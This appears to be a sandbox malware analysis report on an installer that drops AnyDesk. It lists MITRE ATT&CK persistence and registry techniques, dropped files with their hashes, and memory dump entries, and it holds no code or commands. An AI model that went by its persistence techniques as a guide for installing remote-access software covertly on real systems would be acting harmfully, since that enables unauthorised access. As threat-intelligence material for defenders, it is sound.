- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.7MB

MD5
1bc5890c9e7bf54b7712e344b0af9d04

SHA1
78c9302c7a387a8d158f38d501784be9b8b2716d

SHA256
af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6

SHA512
7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
b31412d2595ea971fb79cd9e96c38400

SHA1
e202be33683d8de3448eed8becb6df3d64093599

SHA256
a7811761591e1e8da762becfe453aa8f1e043d3f3e661690aec2fa6284cca2c5

SHA512
43fe9d4c63fb274ccad196de92af0b461f9c6888f7a025668816de95bedf624bf89cef07a4d04061c51be821f332055f466ebb84cb25d073794a9cefeb6a4350

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
3c2411ee7e32c635ef1e1a3e77b68a22

SHA1
d35201685f35f57398d67d93429a536f4f617fba

SHA256
d5744fb7fb22e203623153254ca2e4daab0e53a9317ef411d5f0327cb6ca4ab4

SHA512
407af5d9460d784bd3f24073c6ecf2b421bb025e33997f7dfdf3176693ed4333d752e72be2af3d80942d882cc000889ce2c981ef5ba8f57c05f1cc2e21f84bbf

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
343B

MD5
bb8dfbe76d0dad2cd06d92c3257d60d2

SHA1
9232db6138b537ac13eb965c81dbdac2ed47ff83

SHA256
259b8c034d7ca61612db50e6274c411f742bfc433bb86754bdb00e987eee2b3a

SHA512
0e2e11461ce1db309c90e7dad14032714cbb8ba636ec6fbeb0fe5bf596c0d949a4df1513947740aeeac10bf91562e552c8cf54bf50c159c48d143ff17e365ebf

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
810B

MD5
4075f0e04bffeba05058d8e2a7f8e30c

SHA1
9fc55f6886f19fca7023fb8d65e0708ff0edf696

SHA256
baa719f4cab511c4ef34d3e4bf680839719ec4dd3752fcfe5b4c90d923d1906c

SHA512
dd05ae1bea9ad7386b504ec40f95197cfea5b549925020918375f37f9c36de380e02e2ae0dbb332173e97e6b22ad19dbcb6b02f0e17c6b70103baf4dc1184ae6

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
1019B

MD5
fc914a23f6350ce39a6409bad04a75a9

SHA1
457f9fe457da77448012210d12ecbf4a8982f091

SHA256
305528ea32694c5fb40e0599da5be6ab29a37f8750c42df0a7d7688b06ea6e98

SHA512
8def536b2e976ac7028e719e02cd239bb0e834e5295304e611f4a9473bfa2d77e53b5fe402a93db3508a91fa682340f49bb6eff7a6d2d9667d1e19314c1f6d74

Download Submit
C:\ProgramData\anydesk.exe
Filesize
3.7MB

MD5
1bc5890c9e7bf54b7712e344b0af9d04

SHA1
78c9302c7a387a8d158f38d501784be9b8b2716d

SHA256
af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6

SHA512
7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d

Download Submit
C:\ProgramData\anydesk\AnyDesk.exe
Filesize
3.7MB

MD5
1bc5890c9e7bf54b7712e344b0af9d04

SHA1
78c9302c7a387a8d158f38d501784be9b8b2716d

SHA256
af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6

SHA512
7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d

Download Submit
C:\ProgramData\anydesk\AnyDesk.exe
Filesize
3.7MB

MD5
1bc5890c9e7bf54b7712e344b0af9d04

SHA1
78c9302c7a387a8d158f38d501784be9b8b2716d

SHA256
af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6

SHA512
7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d

Download Submit
C:\ProgramData\anydesk\AnyDesk.exe
Filesize
3.7MB

MD5
1bc5890c9e7bf54b7712e344b0af9d04

SHA1
78c9302c7a387a8d158f38d501784be9b8b2716d

SHA256
af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6

SHA512
7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d

Download Submit
C:\ProgramData\anydesk\AnyDesk.exe
Filesize
3.7MB

MD5
1bc5890c9e7bf54b7712e344b0af9d04

SHA1
78c9302c7a387a8d158f38d501784be9b8b2716d

SHA256
af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6

SHA512
7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files.cab
Filesize
3.6MB

MD5
223fa9756fce44168abd5db7afa03fad

SHA1
2e8bfc88819353490ec4c201445dc004fa9aaff5

SHA256
a929c064c064a1b5013b8fbce01feb7ae08e6bd9b05106dcda8320f9db0fb13d

SHA512
0efe5917995e6ee837aadbb9951ad1f7bcadfa9638de747b219e6a9bbe53fd586118a291776c6ff1c0416b3b439dadb0336ae61e74b1e6d12e9a38f11dac33ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe
Filesize
3.7MB

MD5
8c42ab81f90ee0592f7a709f0f7e320b

SHA1
6656c6ca4611245cda44958bab84866196c9d95b

SHA256
beb6182ceab6ea0b0fdc0f41f8069632317e0f941419b75ede4145593cd6a21c

SHA512
57a444d1b03dcd428eb386e5551137df5b7d401ac39f5b3481dad6a94c7a95c3dd90b638532efdd813c293cf4f949ed4461424fa940410f2d59e2dfdd88ca5ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe
Filesize
3.7MB

MD5
8c42ab81f90ee0592f7a709f0f7e320b

SHA1
6656c6ca4611245cda44958bab84866196c9d95b

SHA256
beb6182ceab6ea0b0fdc0f41f8069632317e0f941419b75ede4145593cd6a21c

SHA512
57a444d1b03dcd428eb386e5551137df5b7d401ac39f5b3481dad6a94c7a95c3dd90b638532efdd813c293cf4f949ed4461424fa940410f2d59e2dfdd88ca5ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\msiwrapper.ini
Filesize
1KB

MD5
df5b8330548d41f20407a49308240c3d

SHA1
1e578c5c57ef836074af12c0e39d5edcde678eb4

SHA256
429a95906fd1e81d471b89012fc638c8f9c368c7b27201078020d656712fc091

SHA512
fad3a641e55d589c1b827b4f9c16cc0f9633ad8eaf5e91c2904cddfebcda28dcaa3bd9b9e2487555b1289bfe08d99737a690291bb0b20006e551d6a67bd8492b

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\msiwrapper.ini
Filesize
1KB

MD5
84c74be25b73fa01d19579a0ec717ddc

SHA1
9be123909ea8a8badce25d58a961dd67e0097ae6

SHA256
826b7fd1c84ddbd28bfd2d9f64bf43232ee5c5b199ed2577f7c0463bec96f22c

SHA512
1304ec7d3e75216dccbf7130bdde2f39d6a8fbe5d8b8b853ad1773e4e4443d437f958a31309a6374127b7e6aa45bff9155e4283d31e5b17494dba03343419fe7

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
4KB

MD5
5484baef0f018c436daf7189fc56201d

SHA1
a0048dfa12d2a383f297130cd88d646f45b41d31

SHA256
7e76353cf42a54c645736751fc692bf46de3a45b1524726a5b30269bc18f60ae

SHA512
64e2513f5a7b9d542319e41ec0dcbe7fc7b2edc9899e8460ba2161ef3494876f12ede17a49d6846139729ed12c6c026fedc1d1d380cc3b05bca4e1ba281751ea

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
8KB

MD5
f54a1fff95b8bab41cbd923f3ab26d27

SHA1
9261bbb490d4cdaeb9d3d87e18ce4c27e3ad5c2d

SHA256
77c30c5859eb6bcb1ef9ee3c3d377fee392cbc5a6f921b14536876712eb27fab

SHA512
00a4b370340fdb2f683fe7cb372dd4f6dd2eac4b222571d3d606ff40440598ca3b594accfa0a0507febeb1a43794ab956e8cff5637b4f62011d5a577d49072d5

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
10KB

MD5
5c75f25a890ed190fca81a8160167538

SHA1
f74a8a28a832c11ed68ce4acc2f7dbad7acf8309

SHA256
0352988266a38ee4b5edfc068abb21455f1a03e4333d57082bbef9d081f6d873

SHA512
956b7c884ab0418df6c54679052efe9491e4bf6c5f218b2fad4e5e64581eba61fed64e44aa937c7ee428d86136f02614117a2ec8af3bad413d945c727b07781f

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
1003B

MD5
6d5cd56a9caefa9be8debb4b019725ae

SHA1
bbdbfc8de70f8600e6fe7f6b06511632f1d57f1e

SHA256
1411873c82b661f5953158c592725f3dd03381e159515fedbc68cf08e8353c97

SHA512
57b25ab44f5668ac7a863692d596e630211aaf06d770e30586163f1a04fad8c9ae693eba0c89e47d31cf0f80f6a3b7efd590bcbac0d9822f47e852c326b551f1

Download Submit
C:\Windows\Installer\MSI155F.tmp
Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
C:\Windows\Installer\MSI155F.tmp
Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
C:\Windows\Installer\MSIB6D0.tmp
Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
C:\Windows\Installer\MSIB6D0.tmp
Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
C:\Windows\Installer\MSIB7AB.tmp
Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
C:\Windows\Installer\MSIB7AB.tmp
Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
C:\Windows\Installer\MSIDCC.tmp
Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
C:\Windows\Installer\MSIDCC.tmp
Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
Filesize
23.0MB

MD5
ad9e61c3c77e93761334126063467bd5

SHA1
17adcfb02d3a4998bd4df212c26fed085c8f230e

SHA256
ce4a13643a6cc763cf9a837b0e8a87250f3c96b872f9651b8065979505470bf1

SHA512
3d42ce7d81fec01bac69abddfdc535695aeaaa198fed6cf2dcfdd26f8fa94da6a5da0797a06546a829c5c0195f3e64562e12c4dca7133ee59cd3322011e5b800

Download Submit
\??\Volume{40beaa24-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{05d60ed7-5737-4afd-800f-11cf018fcf0e}_OnDiskSnapshotProp
Filesize
5KB

MD5
ef999512c78ba2bd91a6063cb4104ff7

SHA1
ddfd4c2c6edde8634f44aa8df78d9b284cb6dcc5

SHA256
42afaa6d9ab6b769f643c9c514343271e4af1cd50be39ca06a551ce2355a23e3

SHA512
90b37a3dff4e1cfbc68d181e1173ca567ef7dd4c6382ba05651cad16441ab61f7245d525268d73ab18ab65c3e289c529034f5278d4e77d94c6e8fe115146de6b

Download Submit
\??\c:\programdata\anydesk.exe
Filesize
3.7MB

MD5
1bc5890c9e7bf54b7712e344b0af9d04

SHA1
78c9302c7a387a8d158f38d501784be9b8b2716d

SHA256
af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6

SHA512
7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d

Download Submit
memory/528-182-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/528-186-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/528-180-0x0000000000000000-mapping.dmp

Download
memory/1288-185-0x0000000000000000-mapping.dmp

Download
memory/1308-169-0x0000000000000000-mapping.dmp

Download
memory/1604-142-0x0000000000000000-mapping.dmp

Download
memory/2008-166-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/2008-157-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/2008-152-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/2040-193-0x0000000000000000-mapping.dmp

Download
memory/2596-144-0x0000000000000000-mapping.dmp

Download
memory/3528-187-0x0000000000000000-mapping.dmp

Download
memory/3732-168-0x0000000000000000-mapping.dmp

Download
memory/4212-131-0x0000000000000000-mapping.dmp

Download
memory/4384-138-0x0000000000000000-mapping.dmp

Download
memory/4532-170-0x0000000000000000-mapping.dmp

Download
memory/4532-179-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/4532-172-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/4716-130-0x0000000000000000-mapping.dmp

Download
memory/4740-134-0x0000000000000000-mapping.dmp

Download
memory/4936-167-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/4936-162-0x0000000000630000-0x00000000015AD000-memory.dmp

Filesize
15.5MB

Download
memory/4960-147-0x0000000000BA0000-0x0000000001B1D000-memory.dmp

Filesize
15.5MB

Download
memory/4960-145-0x0000000000000000-mapping.dmp

Download
memory/4960-150-0x0000000000BA0000-0x0000000001B1D000-memory.dmp

Filesize
15.5MB

Download
memory/4960-159-0x0000000000BA0000-0x0000000001B1D000-memory.dmp

Filesize
15.5MB

Download
memory/5008-140-0x0000000000000000-mapping.dmp

Download